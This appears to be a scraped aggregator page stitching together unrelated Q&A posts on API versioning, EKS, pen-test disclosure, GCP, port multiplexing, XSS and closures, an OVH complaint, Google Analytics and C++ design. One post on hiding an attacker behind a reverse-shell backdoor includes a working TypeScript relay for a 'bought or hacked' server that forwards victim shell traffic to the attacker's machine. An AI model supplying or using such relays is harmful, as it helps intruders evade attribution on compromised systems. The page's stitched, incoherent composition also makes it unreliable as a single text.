API development – Exposing a new version vs. updating the current version

Context

There is a back-end team and a front-end team.

The back end exposes an endpoint to the front-end app:

PATCH car/{carID}/tire

Problem

I want to update the functionality behind the aforementioned PATCH request, which will change the request's body.

Solution

There are two options:

  • Change the current endpoint and ask the front-end team to update the payload in the request's body.
  • Create a new endpoint, car/{carID}/v2/tire, so the front-end team can switch to this version when they see fit (a sketch of the two versions coexisting follows below).
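
For illustration, here is a minimal sketch of how the two versions could coexist during the transition. It assumes a hypothetical TypeScript/Express back end; the route shapes follow the question, and the handlers are stubs:

import express from "express";

const app = express();
app.use(express.json());

// v1: the contract the front end currently depends on.
app.patch("/car/:carID/tire", (req, res) => {
  // ... handle the old request body shape ...
  res.sendStatus(204);
});

// v2: the new contract; the front end switches over when ready.
app.patch("/car/:carID/v2/tire", (req, res) => {
  // ... handle the new request body shape ...
  res.sendStatus(204);
});

app.listen(3000);

Once no client calls v1 anymore, the v1 route can be retired; keeping both alive until then is the usual cost of this approach.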

Question

I prefer the second approach, as it allows the two teams to work asynchronously. The shortcoming here is that every time I need to update this endpoint, I will have to expose a newer version, right?

In which scenarios should I follow the first approach, which actually breaks the current system? Does this violate the open-closed principle? Does the open-closed principle even apply here, and should I follow it in this scenario? Is there an alternative to the two aforementioned methods? Is there a design flaw that led to this scenario?

amazon web services – EKS node not responding and not exposing container ports

So I've been struggling with the fact that I'm unable to expose any deployment in my EKS cluster.

I narrowed it down to this:

  1. My LoadBalancer service's public IP never responds.
  2. I went to the load balancer section in the AWS console.
  3. The load balancer is not working because my cluster node is not passing the health checks.
  4. I SSHed into my cluster node and found that the containers do not have ports associated with them.


This makes the cluster node fail the health checks, so no traffic is forwarded that way.


I tried running a simple nginx container manually, without kubectl, directly on my cluster node:

docker run -p 80:80 nginx

and hitting the node's public IP in my browser. No luck.


Then I tried curling the nginx container directly from the cluster node via SSH:

 curl localhost

And I’m getting this response: “curl: (7) Failed to connect to localhost port 80: Connection refused”
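
A quick way to reproduce what the load balancer's health check sees is to attempt a raw TCP connection to the node on the port the health check targets. Here is a minimal sketch in TypeScript (Node.js); the host and port are hypothetical placeholders, so substitute your node's IP and the NodePort assigned to your service:

import * as net from "net";

const HOST = "203.0.113.10"; // placeholder: your node's public IP
const PORT = 30080;          // placeholder: the service's NodePort

const socket = net.connect({ host: HOST, port: PORT, timeout: 3000 });

socket.on("connect", () => {
  console.log("TCP connect succeeded, so a health check should pass");
  socket.end();
});

socket.on("timeout", () => {
  console.error("Connection timed out (often a security group or routing issue)");
  socket.destroy();
});

socket.on("error", (err) => {
  console.error("Connection refused or failed: " + err.message);
});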

  1. Why do the containers on the cluster node not show any ports?
  2. How can I make the cluster node pass the load balancer health checks?
  3. Could it have something to do with the fact that I created a single-node cluster with eksctl?
  4. What other options do I have to easily run a Kubernetes cluster on AWS?

How to share penetration test results + a remediation plan with third-party companies without exposing oneself

Normally, these kinds of audits require an executive summary to be disclosed.

While security by obscurity is universally recognized as an anti-pattern, that doesn't mean you have to disclose the full details of your vulnerabilities.

Problem 1: the self assessment

I trust the professionalism of your DevOps guy. Without meaning to offend his skills: most external companies demand that a reputable third party perform the security assessment.

Your DevOps guy may be honest and professional and provide real insight into your security. Or he may be insufficiently educated in security and miss important vulnerabilities. Or he may be a former Volkswagen employee (please, please, allow me some humour sometimes) and pretend there are no vulnerabilities just to make a good impression.

This is why companies demand an external, trusted, and reputable party.

Problem 1.5: the cheap assessment. An assessment chosen to save money is a clear indicator that the penetration test is unlikely to work, regardless of whether it found real security holes.

If you hire a reputable security company, they will do a more thorough test.

Problem 2: what to disclose

In general, these external suppliers/customers want an indication of your security level before doing business with your company.

An executive summary (that is, literally, a summary made to be read by high-level executives who don't work on technical matters) contains a list of known vulnerability types, each associated with a severity score.

It does not contain details on how to exploit them.
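
To make the distinction concrete, here is a small illustrative sketch in TypeScript. The data shapes and names are invented for illustration only; the point is that the summary keeps vulnerability types and severity scores while dropping locations and exploit details, and flags what must be fixed (mirroring the >= 6 threshold mentioned below):

// Hypothetical shape of a full finding, as a scanner or pen test might report it.
interface Finding {
  type: string;         // e.g. "SQL injection"
  severity: number;     // score from 0 to 10
  location: string;     // file/endpoint details: not disclosed
  exploitSteps: string; // how to exploit: not disclosed
}

// What goes into the executive summary: types and scores only.
interface SummaryEntry {
  type: string;
  severity: number;
  mustFix: boolean;
}

function toExecutiveSummary(findings: Finding[], threshold = 6): SummaryEntry[] {
  return findings
    .map(({ type, severity }) => ({ type, severity, mustFix: severity >= threshold }))
    .sort((a, b) => b.severity - a.severity);
}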

Problem 3: mitigation

Please expect the suppliers to demand that you fix high-severity vulnerabilities and re-assess the system.

Often they require you to fix vulnerabilities rated >= 6 or 7, depending on their requirements. You will then have to go through another scan to confirm that the agreed vulnerabilities are no longer present in the system.

My case

Source: I was directly involved in such an activity.

In the past years, we had a code scan from Veracode, as requested by one of our US customers, before deploying our code on their premises.
Veracode is not a penetration test; it is an automated static code analysis tool. We had real pen tests too, but they are out of the scope of this example.

It was part of the contract to share the full report with the customer, as they happened to sponsor the scan.

Later, we had an audit request from a Swiss bank we wanted to do business with. They didn't ask to perform a security scan themselves; they just demanded that we had done one and could provide an executive summary.

We responded with the front page of that Veracode audit, displaying their logo and our company name. A few pages later, a table showed the list of remaining vulnerabilities (yes, we had some, and yes, we fixed the high-priority ones!), all scored < 6 out of 10. We gave that to our prospect as well.

We knew exactly where our vulnerabilities were, because Veracode highlighted the file name and line number of the suspect code. We never had to disclose such details to the Swiss customer.

I don't know what happened next, but we probably got the contract. I should ask my Sales Account Manager for details.

google cloud platform – What GCP product to use to run a Docker container exposing a range of UDP ports to the public internet

I am confused about which GCP product to use to run a Docker container, e.g. via "docker run -p 5001-5110:5001-5110/udp hunter_ctrl_standalone:latest -s foo". The container will use ca. 2 GB of RAM and 1 CPU. No load balancing is needed.
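
For reference, here is what such a multi-port UDP workload boils down to, as a minimal TypeScript (Node.js) sketch. The port range matches the docker run command above; the echo behaviour is purely illustrative:

import * as dgram from "dgram";

// Bind a UDP socket on every port in the published range.
for (let port = 5001; port <= 5110; port++) {
  const socket = dgram.createSocket("udp4");
  socket.on("message", (msg, rinfo) => {
    // Echo each datagram back to its sender.
    socket.send(msg, rinfo.port, rinfo.address);
  });
  socket.bind(port);
}

console.log("Listening on UDP ports 5001-5110");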

It seems that Cloud Run is for HTTP(S) workloads only, and GKE also looks geared more toward HTTP(S) workloads. A container on Compute Engine using Container-Optimized OS (COS) does seem to do the trick, but then again, according to https://cloud.google.com/compute/docs/containers/deploying-containers#limitations, it is not possible to operate the container automatically through an API (only the console plus gcloud).

Am I missing a possibility? Is there a good overview of GCP runtime environments with their pros and cons?

tcp – Exposing different services on the same port

My current project contains multiple heterogeneous TCP servers, but our IT guys have clearly declared that they will give me only one port, 443, which is fair enough.

Two options are on the table now. One is a VPN: we can set up a VPN server inside our corporation and implement the access control there. The other is to implement some kind of software switch that peeks at recognizable features of each incoming connection and then routes it to the responsible service. Our IT guys are neutral on both approaches until evidence shows that one is superior to the other.

The pros of the VPN are that it is a well-established technology, widely used in practice, and in our scenario it ensures sensitive information is encrypted. The cons are the effort we will need to implement access-control policies and mechanisms. The number of services will probably grow, and the services will go multi-tenant, so this will become more complex.

The pros of the software switch are that it is simple to implement, because the features/protocols of the sub-services are well known to us. The cons are that we have not heard of such a practice before (I might be ignorant here), and we are not so confident that exposing such an in-house solution to the Internet is a good idea.
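
For what it is worth, the software-switch idea is essentially what the existing tool sslh does: peek at the first bytes of each incoming connection and route by protocol signature. Here is a minimal TypeScript (Node.js) sketch, with hypothetical backends on local ports 8443 and 2222; the TLS signature byte (0x16) is real, everything else is illustrative:

import * as net from "net";

const server = net.createServer((client) => {
  // Peek at the first bytes the client sends before choosing a backend.
  client.once("data", (firstChunk) => {
    // TLS handshakes start with record type 0x16; route anything else elsewhere.
    const backendPort = firstChunk[0] === 0x16 ? 8443 : 2222;

    const backend = net.connect(backendPort, "127.0.0.1", () => {
      backend.write(firstChunk);         // replay the peeked bytes
      client.pipe(backend).pipe(client); // then splice the two streams
    });
    backend.on("error", () => client.destroy());
    client.on("error", () => backend.destroy());
  });
});

server.listen(443);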

If you were me, which approach would you prefer, and why? Details can be clarified if needed and allowed.

I really appreciate any comments and answers.

Reverse shell from backdoor – exposing attacker? [duplicate]

If an attacker has successfully installed a backdoor that connects back to his computer via a reverse shell, how can the attacker hide his IP address?

I'd guess he can't use Tor or a VPN, because packet forwarding would be quite impossible (is that correct?). Maybe he can use a separate bought or hacked server as a proxy? How would he achieve that?

How can the attacker stay anonymous?
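
To make the proxy idea concrete: the intermediate server only has to relay TCP traffic between the victim and the attacker, so the victim never sees the attacker's real IP. A minimal TypeScript (Node.js) sketch follows; all hosts and ports are hypothetical, and in practice the same effect is achieved with off-the-shelf tools such as socat or SSH port forwarding:

import * as net from "net";

// Runs on the intermediate (bought or hacked) server.
const LISTEN_PORT = 4444;          // hypothetical: where the reverse shell connects
const ATTACKER_HOST = "192.0.2.1"; // hypothetical: the attacker's real machine
const ATTACKER_PORT = 5555;        // hypothetical

net.createServer((victim) => {
  const attacker = net.connect(ATTACKER_PORT, ATTACKER_HOST, () => {
    // Splice the two connections together in both directions.
    victim.pipe(attacker).pipe(victim);
  });
  attacker.on("error", () => victim.destroy());
  victim.on("error", () => attacker.destroy());
}).listen(LISTEN_PORT);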

Are JavaScript closures a useful technique to limit exposing data to XSS?

I'm wondering whether using JavaScript closures is a useful technique to limit exposing data to XSS. I realize it wouldn't prevent an attack, but would it reliably make an attack harder to execute, or would it only make my code more irritating to write and read (a waste of time)?

I got the idea from the Auth0 documentation regarding storing OAuth/OIDC tokens. It reads:

Auth0 recommends storing tokens in browser memory as the most secure option. Using Web Workers to handle the transmission and storage of tokens is the best way to protect the tokens, as Web Workers run in a separate global scope than the rest of the application. Use Auth0 SPA SDK whose default storage option is in-memory storage leveraging Web Workers.

If you cannot use Web Workers, Auth0 recommends as an alternative that you use JavaScript closures to emulate private methods.

I can see how this is better than just putting the token or other sensitive information in localStorage, where an XSS attack needs only to execute localStorage.token to get the token.

Now, if you're not familiar with tokens, just apply this reasoning to any sensitive information. In my case I want to build a client-side cache mapping user IDs to usernames for an administrative interface, but I realize that user IDs and usernames are somewhat sensitive, so I wondered if I could "hide" the data.
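
For reference, this is roughly what the closure approach looks like. A minimal TypeScript sketch; the names are illustrative and the token value is faked. The token lives only in the closure's scope, so injected code cannot read it via a global lookup, but it can still call the exposed function, which is why this raises the bar rather than preventing XSS:

// Factory whose local variable is captured in a closure instead of being
// stored on window or in localStorage.
function createTokenStore() {
  let token: string | null = null; // reachable only through the functions below

  return {
    setToken(newToken: string) {
      token = newToken;
    },
    // Expose a way to use the token without exposing the token itself.
    getAuthHeader(): string {
      if (!token) throw new Error("not authenticated");
      return "Bearer " + token;
    },
  };
}

const tokenStore = createTokenStore();
tokenStore.setToken("example-token"); // illustrative only
console.log(tokenStore.getAuthHeader());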

Exposing problems with OVH | Web Hosting Talk


Whenever a company tries to push me around, I have to expose the situation in online communities; they always do the right thing when exposed.

So here is the deal with OVH …

– I ordered a VPS, tested it for some days, was not happy with it, took my data off it, and moved to another provider.

– I then tried to cancel it, but it said there was nothing to cancel: there was no auto-renewal, and unless I renewed it, the service would be terminated at the end of the period.

– The next month, on the 1st of June, I received a new invoice for it.

– I created a ticket and asked for the invoice to be canceled, as I was not using that server and had no auto-renewal.

– I was asked to first use the "delete" function, which was buried deeper in the menus; I deleted the server that day and informed them.

– I got no reply for 10 days, so I asked them again about this.

– I was told I should pay that invoice and that I might receive OVH credit (no refund).

So why pay, if I never used it and I am 100% sure it said auto-renewal was NOT enabled?! I asked to cancel it hours after the invoice; I never used it.

OVH Ticket number 3829965690

As a side note, here is why I was not happy with their VPS:

Every 4-5 hours they would take the server offline for exactly 15 minutes and claim it was under a DDoS attack.

The server was never under attack; they do this whenever your site generates traffic. This is ridiculous and, excuse me, PATHETIC.

After I moved all my data off, the server was unused; I downloaded a file from the server with wget and instantly got the "under attack" email, and the server was blocked.

I was the only client on the server then; their anti-DDoS system is fully broken, and many people say the exact same thing on Trustpilot.

Whenever they claimed I was "under DDoS attack", I asked them to show me sample IPs; they claimed they don't have any.

The VPS could be decent without the broken "anti-DDoS" system and the broken "support" staff.

What is the best way to provide access to Google Analytics in these circumstances without exposing all Google Analytics data?

In essence, an important Affiliate links to a URL on a domain registered by the Client. This URL redirects to a landing page specific to this Affiliate on the Client's primary domain. The landing page has its own URL/offer and a CTA into the Client's purchase funnel.

Because the first URL redirects to the second URL, there is no reference for GA to attribute the traffic to the Affiliate.

The Affiliate would like to see the Google Analytics data related to the traffic that the Affiliate sends to the Client: sessions, transactions, and Goals (including purchases through the funnel). The Client does not want to expose all of its GA data to the Affiliate.

What is the best way to provide such access?

Initially I thought about filters on a view created specifically for the Affiliate, but of the options available, I don't think any of them will work.

c++ – Is this a good way to divide class responsibilities without exposing private data?

I find that most of the articles/theory discussing the SRP ignore how the new classes that take over the separated responsibilities access data that was previously private to the original class. As such, I am struggling to find good ways to divide classes without exposing private data.

Take, for example, a Gripper class that represents a robotic gripper in a computer-graphics simulation. This class handles the logic of a gripper: it picks up objects, rotates them, places them in a different position, etc. The gripper can also be drawn in a GUI.

This breaks the SRP: there are two reasons for the Gripper class to change, namely changes in the logic of how a gripper works and changes in how a gripper is drawn. Nevertheless, Gripper has some private data members that are used both by the logic and by the drawing part. Simply exposing those members through some (const) getters feels like a step backwards: I would be exposing implementation details, just through this new "interface", and it frankly seems wrong.

Then I came up with this:

// Placeholder data types so the sketch is self-contained.
struct Foo {};
struct Bar {};
struct Qux {};

class Renderer
{
public:

    /* Takes the data needed to draw a gripper and does so. */
    void
    DrawGripper(const Foo& foo, const Qux& qux);

    /* Additional methods to draw other things. */
};

class Gripper
{
public:

    /* Hands only the drawing-related members to the renderer. */
    void
    Draw(Renderer& renderer) const
    {
        renderer.DrawGripper(mFoo, mQux);
    }

private:

    Foo mFoo;
    Bar mBar;
    Qux mQux;
};

Pro:

  • Better separation: apart from the Draw function, which consists of one line of code, all the drawing code is now gone from Gripper.
  • Renderer could be an abstract interface, easily allowing different implementations.
  • The data can be passed by const reference to DrawGripper, whereas a plain member function would have full access to all members.

Cons:

  • Gripper still has a Draw function and knows about Renderer.

I feel that this con is manageable. In the end, one of the reasons for Gripper to exist is to eventually be drawn on the screen, so the fact that it still has a Draw function does not seem so bad. Perhaps this is a case of having to choose the lesser of two evils? The alternative of exposing private data is much worse, in my humble opinion.

Am I on the right track here? Is this a good pattern to apply in cases like this? Any problems, or better ways?